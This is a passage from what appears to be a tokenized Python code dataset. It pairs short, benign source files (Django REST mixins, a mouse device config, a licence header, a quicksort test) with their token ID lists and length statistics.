5626,
7788,
1797,
4694,
20634,
8476,
7,
45472,
8476,
2389,
40383,
4810,
3955,
13153,
35374,
5870,
25171,
7,
45472,
8476,
2389,
1279,
29,
366,
12340,
41752,
54,
12532,
40383,
5626,
15697,
5870,
25171,
7,
47924,
54,
12532,
1279,
29,
366,
12340,
37,
20608,
40383,
5626,
15697,
5870,
25171,
7,
37,
20608,
1279,
29,
366,
12340,
337,
20608,
40383,
11,
406,
20608,
40383,
5626,
15697,
5870,
25171,
7,
43,
20608,
1279,
29,
366,
12340,
41153,
9878,
9864,
5626,
15697,
11,
41894,
25294,
1268,
40383,
11,
412,
5673,
4146,
2389,
40383,
5626,
15697,
5870,
25171,
7,
27630,
4146,
2389,
1279,
29,
366,
12340,
449,
4261,
1797,
35,
18379,
2849,
40383,
5626,
15697,
5870,
25171,
7,
41,
4261,
1797,
35,
18379,
2849,
1279,
29,
366,
12340,
5984,
7707,
7597,
40383,
5626,
15697,
5870,
25171,
7,
2885,
7707,
7597,
1279,
29,
366,
12340,
402,
10619,
1137,
40383,
5626,
15697,
5870,
25171,
7,
38,
10619,
1137,
1279,
29,
366,
12340,
8410,
33,
40383,
5626,
15697,
5870,
25171,
7,
35,
9864,
1279,
29,
366,
12340,
347,
11417,
40383,
5626,
15697,
5870,
25171,
7,
33,
11417,
1279,
29,
366,
12340,
371,
15154,
40383,
5626,
15697,
5870,
25171,
7,
49,
15154,
1279,
29,
366,
12340,
18805,
40579,
35744,
2937,
40383,
5626,
15697,
8,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
7203,
15931,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
20634,
8476,
16,
7,
45472,
8476,
2389,
40383,
11,
22904,
10659,
40383,
5626,
15697,
11,
376,
6965,
16284,
35374,
357,
45472,
8476,
2389,
8,
4526,
24302,
24181,
1546,
20634,
8476,
7,
45472,
8476,
2389,
4008,
15931,
4943,
201,
198,
201,
198,
66,
21471,
13,
41049,
7203,
15931,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
9440,
45710,
12394,
357,
9858,
45710,
12394,
62,
15285,
2420,
4810,
3955,
13153,
35374,
11,
9297,
2246,
4720,
4851,
49,
12789,
2420,
5626,
15697,
5870,
25171,
7,
6489,
2246,
4720,
4851,
49,
12789,
1279,
29,
10148,
828,
31742,
4720,
4851,
49,
12789,
2420,
11,
8740,
3955,
1961,
1546,
40165,
2420,
11,
27993,
2420,
11,
20634,
2149,
6465,
6234,
2420,
11,
15486,
2937,
2420,
11,
569,
37,
20608,
2420,
11,
16990,
20608,
2420,
11,
569,
43,
20608,
2420,
11,
12341,
20608,
2420,
11,
3001,
20608,
2420,
11,
8355,
20608,
2420,
11,
1294,
1137,
2389,
2420,
11,
376,
6965,
16284,
35374,
7,
29904,
2389,
8,
4526,
24302,
24181,
1546,
327,
3824,
4146,
16868,
16,
7,
29904,
2389,
4008,
15931,
4943,
201,
198,
201,
198,
66,
21471,
13,
41049,
7203,
15931,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
327,
3824,
4146,
16868,
16,
357,
29904,
2389,
2420,
4810,
3955,
13153,
35374,
5870,
25171,
7,
29904,
2389,
1279,
29,
10148,
828,
41752,
54,
12532,
2420,
5626,
15697,
5870,
25171,
7,
47924,
54,
12532,
1279,
29,
10148,
828,
376,
20608,
2420,
11,
337,
20608,
2420,
11,
406,
20608,
2420,
11,
8410,
33,
2420,
11,
402,
10619,
1137,
2420,
11,
18805,
40579,
35744,
2937,
2420,
11,
412,
5673,
4146,
2389,
2420,
5626,
15697,
11,
440,
4093,
8577,
6234,
2420,
11,
5984,
7707,
7597,
2420,
11,
41894,
25294,
1268,
2420,
11,
41153,
44812,
8,
15931,
4943,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
327,
3824,
4146,
16868,
17,
357,
29904,
2389,
2420,
837,
22904,
10659,
1271,
11,
30818,
16284,
35374,
357,
29904,
2389,
8,
4526,
24302,
24181,
1546,
327,
3824,
4146,
16868,
16,
7,
29904,
2389,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
8740,
3955,
17961,
7,
9419,
3955,
17961,
2389,
1271,
4810,
3955,
13153,
35374,
11,
376,
20608,
2420,
11,
337,
20608,
2420,
11,
406,
20608,
2420,
11,
8410,
33,
2420,
11,
9878,
22808,
46846,
2420,
11,
15486,
2937,
2420,
11,
4810,
41254,
9050,
1271,
11,
402,
10619,
1137,
2420,
11,
41153,
9878,
9864,
5626,
15697,
8,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
42001,
16,
357,
34,
1921,
1677,
46,
1271,
4810,
3955,
13153,
35374,
11,
350,
1677,
1847,
34,
3727,
2767,
56,
11401,
2420,
11,
44513,
41359,
13246,
1271,
11,
20634,
2149,
6465,
6234,
2420,
11,
22196,
40165,
2420,
5626,
15697,
11,
13349,
10619,
6158,
2420,
5626,
15697,
11,
7852,
48751,
6158,
2420,
11,
9440,
45710,
12394,
62,
15285,
40383,
11,
376,
6965,
16284,
35374,
357,
9858,
45710,
12394,
62,
15285,
8,
4526,
24302,
24181,
1546,
9440,
45710,
12394,
7,
9858,
45710,
12394,
62,
15285,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
8740,
3955,
17961,
18,
357,
9419,
3955,
17961,
2389,
2420,
11,
22904,
10659,
2420,
11,
376,
6965,
16284,
35374,
357,
9419,
3955,
17961,
2389,
8,
4526,
24302,
24181,
1546,
8740,
3955,
17961,
7,
9419,
3955,
17961,
2389,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
42001,
17,
7,
34,
1921,
1677,
46,
1271,
11,
20634,
8476,
2389,
2420,
11,
376,
6965,
16284,
35374,
357,
45472,
8476,
2389,
8,
4526,
24302,
24181,
1546,
20634,
8476,
7,
45472,
8476,
2389,
828,
376,
6965,
16284,
35374,
7,
34,
1921,
1677,
46,
8,
4526,
24302,
24181,
1546,
42001,
16,
7,
34,
1921,
1677,
46,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
42001,
18,
7,
34,
1921,
1677,
46,
1271,
837,
569,
37,
20608,
2420,
11,
16990,
20608,
2420,
11,
569,
43,
20608,
2420,
11,
569,
11879,
1271,
11,
569,
2885,
7707,
7597,
2420,
11,
376,
6965,
16284,
35374,
357,
34,
1921,
1677,
46,
8,
4526,
24302,
24181,
1546,
42001,
16,
7,
34,
1921,
1677,
46,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
42001,
19,
7,
34,
1921,
1677,
46,
1271,
11,
23703,
15285,
1271,
11,
376,
6965,
16284,
35374,
7,
34,
1921,
1677,
46,
8,
4526,
24302,
24181,
1546,
42001,
16,
7,
34,
1921,
1677,
46,
828,
376,
6965,
16284,
35374,
7,
39776,
15285,
8,
4526,
24302,
24181,
1546,
8740,
12789,
7,
39776,
15285,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
8740,
3955,
17961,
17,
7,
9419,
3955,
17961,
2389,
2420,
11,
5984,
7707,
7597,
2420,
11,
376,
6965,
16284,
35374,
357,
9419,
3955,
17961,
2389,
8,
4526,
24302,
24181,
1546,
8740,
3955,
17961,
7,
9419,
3955,
17961,
2389,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
8740,
3955,
17961,
16,
357,
9419,
3955,
17961,
2389,
2420,
11,
4522,
3525,
30643,
6234,
44,
14175,
50,
2420,
11,
30818,
16284,
35374,
357,
9419,
3955,
17961,
2389,
8,
4526,
24302,
24181,
1546,
8740,
3955,
17961,
7,
9419,
3955,
17961,
2389,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
8740,
12789,
17,
357,
39776,
15285,
1271,
11,
8740,
3955,
17961,
2389,
1271,
11,
376,
6965,
16284,
35374,
7,
39776,
15285,
8,
4526,
24302,
24181,
1546,
8740,
12789,
7,
39776,
15285,
828,
376,
6965,
16284,
35374,
7,
9419,
3955,
17961,
2389,
8,
4526,
24302,
24181,
1546,
8740,
3955,
17961,
7,
9419,
3955,
17961,
2389,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
8740,
12789,
18,
357,
39776,
15285,
1271,
11,
350,
1677,
1847,
34,
3727,
2767,
56,
11401,
2420,
11,
44513,
41359,
13246,
1271,
11,
376,
6965,
16284,
35374,
357,
39776,
15285,
8,
4526,
24302,
24181,
1546,
8740,
12789,
7,
39776,
15285,
4008,
11537,
201,
198,
201,
198,
66,
21471,
13,
41049,
7,
705,
43387,
6158,
43679,
16876,
5626,
7788,
1797,
4694,
8740,
12789,
7,
39776,
15285,
1271,
4810,
3955,
13153,
35374,
11,
29506,
11879,
2390,
28270,
1271,
11,
3268,
41,
4261,
1961,
1271,
11,
5550,
1404,
7998,
1271,
11,
360,
1404,
4720,
4851,
49,
12789,
2420,
5626,
15697,
11,
9297,
2246,
4720,
4851,
49,
12789,
2420,
8,
11537,
201,
198,
201,
198,
38659,
13,
41509,
3419,
201,
198,
201,
198,
83,
28,
30488,
13,
51,
74,
3419,
201,
198,
83,
13,
7839,
10786,
7792,
5258,
11537,
201,
198,
83,
13,
11250,
495,
7,
25249,
796,
705,
11186,
11537,
201,
198,
2,
83,
13,
469,
15748,
7203,
33698,
87,
7410,
10,
1270,
10,
1270,
4943,
201,
198,
86,
11,
289,
796,
256,
13,
5404,
6513,
62,
9612,
10394,
22784,
256,
13,
5404,
6513,
62,
9612,
17015,
3419,
201,
198,
83,
13,
469,
15748,
7203,
4,
34350,
4,
67,
10,
15,
10,
15,
1,
4064,
357,
86,
11,
289,
4008,
201,
198,
2,
10331,
21466,
796,
256,
74,
23252,
13,
23252,
7,
17989,
2625,
28595,
968,
7993,
1600,
2546,
28,
1899,
8,
201,
198,
201,
198,
201,
198,
19722,
8053,
28,
17816,
9039,
41707,
32610,
666,
20520,
201,
198,
85,
796,
256,
74,
13,
10100,
19852,
7,
83,
8,
201,
198,
85,
13,
2617,
10786,
17563,
11787,
5994,
4458,
45828,
28955,
201,
198,
8738,
796,
256,
74,
13,
19722,
23381,
7,
83,
11,
410,
11,
1635,
19722,
8053,
8,
201,
198,
201,
198,
28825,
28,
30488,
23252,
13,
23252,
7,
17989,
2625,
28595,
968,
7993,
1600,
2546,
28,
1433,
8,
201,
198,
8738,
13,
11250,
495,
7,
2411,
2086,
2625,
39390,
1600,
10331,
28,
30488,
23252,
13,
23252,
7,
17989,
2625,
28595,
968,
7993,
1600,
2546,
28,
1238,
4008,
201,
198,
11011,
19662,
28,
33986,
7,
83,
11,
2420,
11639,
54,
3698,
9858,
36,
5390,
20634,
8476,
350,
9863,
1847,
3256,
35904,
11639,
13424,
3256,
277,
70,
11639,
11186,
3256,
10331,
28,
30488,
23252,
13,
23252,
7,
17989,
2625,
28595,
968,
7993,
1600,
2546,
28,
1899,
828,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
86,
4126,
28,
33986,
7,
83,
11,
2420,
11639,
51,
220,
220,
440,
220,
220,
350,
220,
220,
220,
220,
220,
370,
220,
220,
317,
220,
220,
399,
220,
220,
309,
220,
220,
412,
220,
220,
360,
3256,
277,
70,
11639,
445,
3256,
10331,
28,
30488,
23252,
13,
23252,
7,
17989,
2625,
28595,
968,
7993,
1600,
2546,
28,
1821,
828,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
49170,
28,
33986,
7,
83,
11,
2420,
11639,
17469,
10383,
3307,
284,
23093,
3256,
35904,
11639,
11186,
3256,
40616,
11639,
13424,
3256,
10331,
28,
30488,
23252,
13,
23252,
7,
17989,
2625,
28595,
968,
7993,
1600,
2546,
28,
1238,
828,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
201,
198,
7220,
28,
33986,
7,
83,
11,
2420,
11639,
29904,
4522,
46083,
10331,
28,
28825,
11,
20192,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
28712,
28,
33986,
7,
83,
11,
2420,
11639,
47924,
54,
12532,
3256,
10331,
28,
28825,
11,
4865,
10394,
28,
17,
11,
2411,
2086,
2625,
39390,
4943,
201,
198,
27112,
28,
30150,
7,
83,
11,
10331,
28,
30488,
23252,
13,
23252,
7,
17989,
2625,
28595,
968,
7993,
1600,
2546,
28,
1270,
828,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
862,
16993,
28,
30150,
7,
83,
11,
12860,
11639,
9,
3256,
10331,
28,
30488,
23252,
13,
23252,
7,
17989,
2625,
28595,
968,
7993,
1600,
2546,
28,
1270,
828,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
46002,
28,
21864,
7,
83,
11,
2420,
11639,
50,
10526,
36393,
3256,
3141,
28,
9255,
11,
10331,
28,
28825,
11,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
42503,
28,
21864,
7,
83,
11,
2420,
11639,
29931,
1503,
3256,
3141,
28,
20063,
11,
10331,
28,
28825,
11,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
12683,
929,
28,
21864,
7,
83,
11,
2420,
11639,
31553,
41517,
3256,
3141,
28,
30238,
11,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
19836,
28,
21864,
7,
83,
11,
2420,
11639,
6369,
2043,
3256,
3141,
28,
19836,
11,
10369,
28,
28825,
11,
20192,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
12683,
929,
13,
11250,
495,
7,
10331,
28,
7203,
28595,
968,
7993,
1600,
1495,
4032,
36575,
6,
4008,
201,
198,
201,
198,
201,
198,
69,
28,
66,
21471,
13,
41049,
10786,
46506,
41153,
422,
8740,
3955,
17961,
1502,
416,
8475,
11537,
201,
198,
29510,
28,
69,
13,
69,
7569,
439,
3419,
201,
198,
489,
396,
28,
21737,
201,
198,
361,
18896,
7,
29510,
8,
29,
28,
21,
25,
201,
198,
220,
220,
220,
329,
1312,
287,
2837,
7,
21,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
3108,
796,
366,
89,
1,
1343,
965,
7,
72,
8,
1343,
45302,
9479,
6,
201,
198,
220,
220,
220,
220,
220,
220,
220,
351,
1280,
7,
6978,
11,
705,
39346,
11537,
355,
2393,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2393,
13,
13564,
7,
29510,
58,
72,
7131,
15,
12962,
201,
198,
220,
220,
220,
220,
220,
220,
220,
458,
396,
13,
33295,
7,
6978,
8,
201,
198,
17772,
25,
201,
198,
220,
220,
220,
329,
1312,
287,
2837,
7,
11925,
7,
29510,
8,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
3108,
796,
366,
89,
1,
1343,
965,
7,
72,
8,
1343,
45302,
9479,
6,
201,
198,
220,
220,
220,
220,
220,
220,
220,
351,
1280,
7,
6978,
11,
705,
39346,
11537,
355,
2393,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2393,
13,
13564,
7,
29510,
58,
72,
7131,
15,
12962,
201,
198,
220,
220,
220,
220,
220,
220,
220,
458,
396,
13,
33295,
7,
6978,
8,
201,
198,
220,
220,
220,
329,
1312,
287,
2837,
357,
11925,
7,
29510,
13219,
16,
11,
21,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
458,
396,
13,
33295,
10786,
9536,
78,
13,
9479,
11537,
201,
198,
201,
198,
201,
198,
83,
13,
2220,
16,
796,
7412,
13,
9654,
7,
489,
396,
58,
15,
12962,
201,
198,
83,
13,
2220,
16,
796,
256,
13,
2220,
16,
13,
411,
1096,
19510,
2167,
11,
939,
828,
7412,
13,
8643,
12576,
43429,
8,
201,
198,
83,
13,
23074,
16,
796,
7412,
51,
74,
13,
6191,
5159,
7,
83,
13,
2220,
16,
11,
4958,
28,
83,
8,
201,
198,
83,
13,
9600,
16,
796,
36052,
7,
83,
11,
2939,
28,
83,
13,
23074,
16,
11,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
83,
13,
9600,
16,
13,
9060,
796,
256,
13,
23074,
16,
201,
198,
201,
198,
83,
13,
2220,
17,
796,
7412,
13,
9654,
7,
489,
396,
58,
16,
12962,
201,
198,
83,
13,
2220,
17,
796,
256,
13,
2220,
17,
13,
411,
1096,
19510,
2167,
11,
939,
828,
7412,
13,
8643,
12576,
43429,
8,
201,
198,
83,
13,
23074,
17,
796,
7412,
51,
74,
13,
6191,
5159,
7,
83,
13,
2220,
17,
11,
4958,
28,
83,
8,
201,
198,
83,
13,
9600,
17,
796,
36052,
7,
83,
11,
2939,
28,
83,
13,
23074,
17,
11,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
83,
13,
9600,
17,
13,
9060,
796,
256,
13,
23074,
17,
201,
198,
201,
198,
83,
13,
2220,
18,
796,
7412,
13,
9654,
7,
489,
396,
58,
17,
12962,
201,
198,
83,
13,
2220,
18,
796,
256,
13,
2220,
18,
13,
411,
1096,
19510,
2167,
11,
939,
828,
7412,
13,
8643,
12576,
43429,
8,
201,
198,
83,
13,
23074,
18,
796,
7412,
51,
74,
13,
6191,
5159,
7,
83,
13,
2220,
18,
11,
4958,
28,
83,
8,
201,
198,
83,
13,
9600,
18,
796,
36052,
7,
83,
11,
2939,
28,
83,
13,
23074,
18,
11,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
83,
13,
9600,
18,
13,
9060,
796,
256,
13,
23074,
18,
201,
198,
201,
198,
83,
13,
2220,
19,
796,
7412,
13,
9654,
7,
489,
396,
58,
18,
12962,
201,
198,
83,
13,
2220,
19,
796,
256,
13,
2220,
19,
13,
411,
1096,
19510,
2167,
11,
939,
828,
7412,
13,
8643,
12576,
43429,
8,
201,
198,
83,
13,
23074,
19,
796,
7412,
51,
74,
13,
6191,
5159,
7,
83,
13,
2220,
19,
11,
4958,
28,
83,
8,
201,
198,
83,
13,
9600,
19,
796,
36052,
7,
83,
11,
2939,
28,
83,
13,
23074,
19,
11,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
83,
13,
9600,
19,
13,
9060,
796,
256,
13,
23074,
19,
201,
198,
201,
198,
83,
13,
2220,
20,
796,
7412,
13,
9654,
7,
489,
396,
58,
19,
12962,
201,
198,
83,
13,
2220,
20,
796,
256,
13,
2220,
20,
13,
411,
1096,
19510,
2167,
11,
939,
828,
7412,
13,
8643,
12576,
43429,
8,
201,
198,
83,
13,
23074,
20,
796,
7412,
51,
74,
13,
6191,
5159,
7,
83,
13,
2220,
20,
11,
4958,
28,
83,
8,
201,
198,
83,
13,
9600,
20,
796,
36052,
7,
83,
11,
2939,
28,
83,
13,
23074,
20,
11,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
83,
13,
9600,
20,
13,
9060,
796,
256,
13,
23074,
20,
201,
198,
201,
198,
83,
13,
2220,
21,
796,
7412,
13,
9654,
7,
489,
396,
58,
20,
12962,
201,
198,
83,
13,
2220,
21,
796,
256,
13,
2220,
21,
13,
411,
1096,
19510,
2167,
11,
939,
828,
7412,
13,
8643,
12576,
43429,
8,
201,
198,
83,
13,
23074,
21,
796,
7412,
51,
74,
13,
6191,
5159,
7,
83,
13,
2220,
21,
11,
4958,
28,
83,
8,
201,
198,
83,
13,
9600,
21,
796,
36052,
7,
83,
11,
2939,
28,
83,
13,
23074,
21,
11,
4865,
10394,
28,
17,
11,
8259,
2625,
39390,
4943,
201,
198,
83,
13,
9600,
21,
13,
9060,
796,
256,
13,
23074,
21,
201,
198,
201,
198,
201,
198,
11011,
19662,
13,
5372,
7,
87,
28,
15,
11,
331,
28,
20,
11,
9647,
28,
86,
11,
6001,
28,
3064,
8,
201,
198,
201,
198,
86,
4126,
13,
5372,
7,
87,
28,
8054,
11,
331,
28,
14198,
11,
9647,
28,
7410,
11,
6001,
28,
2154,
8,
201,
198,
201,
198,
49170,
13,
5372,
7,
87,
28,
3829,
837,
331,
28,
2167,
11,
9647,
28,
33289,
11,
6001,
28,
2425,
8,
201,
198,
201,
198,
8738,
13,
5372,
7,
87,
796,
4101,
11,
331,
796,
5867,
837,
9647,
28,
33289,
11,
6001,
28,
2154,
8,
201,
198,
7220,
13,
5372,
7,
87,
796,
4101,
11,
331,
796,
29101,
837,
9647,
28,
2167,
11,
6001,
28,
2154,
8,
201,
198,
27112,
13,
5372,
7,
87,
796,
5867,
11,
331,
796,
29101,
837,
9647,
28,
2167,
11,
6001,
28,
2154,
8,
201,
198,
28712,
13,
5372,
7,
87,
796,
4101,
11,
331,
796,
34091,
837,
9647,
28,
2167,
11,
6001,
28,
2154,
8,
201,
198,
862,
16993,
13,
5372,
7,
87,
796,
5867,
11,
331,
796,
34091,
837,
9647,
28,
2167,
11,
6001,
28,
2154,
8,
201,
198,
201,
198,
46002,
13,
5372,
7,
87,
796,
4101,
11,
331,
796,
38190,
11,
9647,
28,
2167,
11,
6001,
28,
2154,
8,
201,
198,
42503,
13,
5372,
7,
87,
796,
5867,
11,
331,
796,
38190,
837,
9647,
28,
2167,
11,
6001,
28,
2154,
8,
201,
198,
201,
198,
12683,
929,
13,
5372,
7,
87,
28,
4101,
11,
331,
796,
44505,
11,
9647,
796,
939,
11,
6001,
796,
4317,
8,
201,
198,
19836,
13,
5372,
7,
87,
28,
5867,
11,
331,
796,
44505,
11,
9647,
796,
939,
11,
6001,
796,
4317,
8,
201,
198,
201,
198,
83,
13,
9600,
16,
13,
5372,
7,
87,
796,
10053,
11,
331,
796,
8646,
837,
9647,
28,
2167,
11,
6001,
28,
2167,
8,
201,
198,
83,
13,
9600,
17,
13,
5372,
7,
87,
796,
15897,
11,
331,
796,
8646,
837,
9647,
28,
2167,
11,
6001,
28,
2167,
8,
201,
198,
83,
13,
9600,
18,
13,
5372,
7,
87,
796,
24938,
11,
331,
796,
8646,
837,
9647,
28,
2167,
11,
6001,
28,
2167,
8,
201,
198,
83,
13,
9600,
19,
13,
5372,
7,
87,
796,
10053,
11,
331,
796,
5323,
837,
9647,
28,
2167,
11,
6001,
28,
2167,
8,
201,
198,
83,
13,
9600,
20,
13,
5372,
7,
87,
796,
15897,
11,
331,
796,
5323,
837,
9647,
28,
2167,
11,
6001,
28,
2167,
8,
201,
198,
83,
13,
9600,
21,
13,
5372,
7,
87,
796,
24938,
11,
331,
796,
5323,
837,
9647,
28,
2167,
11,
6001,
28,
2167,
8,
201,
198,
12417,
26268,
3419,
201,
198
] | 2.474851 | 3,519 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from clastic import Application, StaticApplication, StaticFileRoute
_CUR_DIR = os.path.dirname(os.path.abspath(__file__))
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
198,
11748,
28686,
198,
198,
6738,
537,
3477,
1330,
15678,
11,
36125,
23416,
11,
36125,
8979,
43401,
198,
198,
62,
34,
4261,
62,
34720,
796,
28686,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
397,
2777,
776,
7,
834,
7753,
834,
4008,
628,
198
] | 2.830986 | 71 |
from .rival300csgofadeedition import rival300csgofadeedition
rival300csgofadeeditionstm32 = {
"name": "SteelSeries Rival 300 CS:GO Fade Edition (stm32)",
"vendor_id": 0x1038,
"product_id": 0x1716,
"interface_number": 0,
"commands": rival300csgofadeedition["commands"],
}
| [
6738,
764,
43171,
6200,
6359,
70,
1659,
671,
28736,
1330,
8976,
6200,
6359,
70,
1659,
671,
28736,
628,
198,
43171,
6200,
6359,
70,
1659,
671,
28736,
301,
76,
2624,
796,
1391,
198,
220,
220,
220,
366,
3672,
1298,
366,
39807,
27996,
371,
2473,
5867,
9429,
25,
11230,
376,
671,
5061,
357,
301,
76,
2624,
42501,
628,
220,
220,
220,
366,
85,
18738,
62,
312,
1298,
657,
87,
940,
2548,
11,
198,
220,
220,
220,
366,
11167,
62,
312,
1298,
657,
87,
1558,
1433,
11,
198,
220,
220,
220,
366,
39994,
62,
17618,
1298,
657,
11,
628,
220,
220,
220,
366,
9503,
1746,
1298,
8976,
6200,
6359,
70,
1659,
671,
28736,
14692,
9503,
1746,
33116,
198,
198,
92,
198
] | 2.508475 | 118 |
"""
Basic building blocks for generic class based views.
We don't bind behaviour to http method handlers yet,
which allows mixin classes to be composed in interesting ways.
"""
from rest_framework import status
from rest_framework.response import Response
from rest_framework.settings import api_settings
class CreateModelMixin:
"""
Create a model instance.
"""
class ListModelMixin:
"""
List a queryset.
"""
class RetrieveModelMixin:
"""
Retrieve a model instance.
"""
class UpdateModelMixin:
"""
Update a model instance.
"""
class DestroyModelMixin:
"""
Destroy a model instance.
"""
| [
37811,
198,
26416,
2615,
7021,
329,
14276,
1398,
1912,
5009,
13,
198,
198,
1135,
836,
470,
11007,
9172,
284,
2638,
2446,
32847,
1865,
11,
198,
4758,
3578,
5022,
259,
6097,
284,
307,
13160,
287,
3499,
2842,
13,
198,
37811,
198,
6738,
1334,
62,
30604,
1330,
3722,
198,
6738,
1334,
62,
30604,
13,
26209,
1330,
18261,
198,
6738,
1334,
62,
30604,
13,
33692,
1330,
40391,
62,
33692,
628,
198,
4871,
13610,
17633,
35608,
259,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
13610,
257,
2746,
4554,
13,
198,
220,
220,
220,
37227,
628,
198,
4871,
7343,
17633,
35608,
259,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
7343,
257,
42517,
893,
316,
13,
198,
220,
220,
220,
37227,
628,
198,
4871,
4990,
30227,
17633,
35608,
259,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
4990,
30227,
257,
2746,
4554,
13,
198,
220,
220,
220,
37227,
628,
198,
4871,
10133,
17633,
35608,
259,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
10133,
257,
2746,
4554,
13,
198,
220,
220,
220,
37227,
628,
198,
4871,
19448,
17633,
35608,
259,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
19448,
257,
2746,
4554,
13,
198,
220,
220,
220,
37227,
198
] | 3.204878 | 205 |
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
| [
2,
19617,
28,
40477,
23,
198,
198,
2,
15069,
2864,
28591,
5097,
2606,
35,
13,
9858,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921,
743,
7330,
257,
4866,
286,
262,
13789,
379,
198,
2,
198,
2,
220,
220,
220,
220,
2638,
1378,
2503,
13,
43073,
13,
2398,
14,
677,
4541,
14,
43,
2149,
24290,
12,
17,
13,
15,
198,
2,
198,
2,
17486,
2672,
416,
9723,
1099,
393,
4987,
284,
287,
3597,
11,
3788,
198,
2,
9387,
739,
262,
13789,
318,
9387,
319,
281,
366,
1921,
3180,
1,
29809,
1797,
11,
198,
2,
42881,
34764,
11015,
6375,
7102,
49828,
11053,
3963,
15529,
509,
12115,
11,
2035,
4911,
393,
17142,
13,
198,
2,
4091,
262,
13789,
329,
262,
2176,
3303,
15030,
21627,
290,
198,
2,
11247,
739,
262,
13789,
13,
198,
2,
198,
2,
24550,
25,
770,
1398,
318,
8295,
7560,
416,
262,
474,
67,
17721,
2438,
17301,
1430,
13,
628
] | 3.73743 | 179 |
from actions.security import Security
from command_abc import AbsCommand
| [
6738,
4028,
13,
12961,
1330,
4765,
201,
198,
6738,
3141,
62,
39305,
1330,
13051,
21575,
201,
198,
201,
198,
201
] | 3.9 | 20 |
if __name__ == '__main__':
import random
j = 1
while j <= 1000:
x = [random.randint(0,999999999999) for i in range(0,j)]
y = [a for a in x]
z = [a for a in x]
y.sort()
quick_sort(x, 0, len(x) - 1)
if y != x:
print("Sorting failed for {}".format(z))
break
j += 1
print("Success on iteration {}".format(j - 1))
| [
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1330,
4738,
198,
220,
220,
220,
474,
796,
352,
198,
220,
220,
220,
981,
474,
19841,
8576,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
796,
685,
25120,
13,
25192,
600,
7,
15,
11,
24214,
24214,
24214,
8,
329,
1312,
287,
2837,
7,
15,
11,
73,
15437,
198,
220,
220,
220,
220,
220,
220,
220,
331,
796,
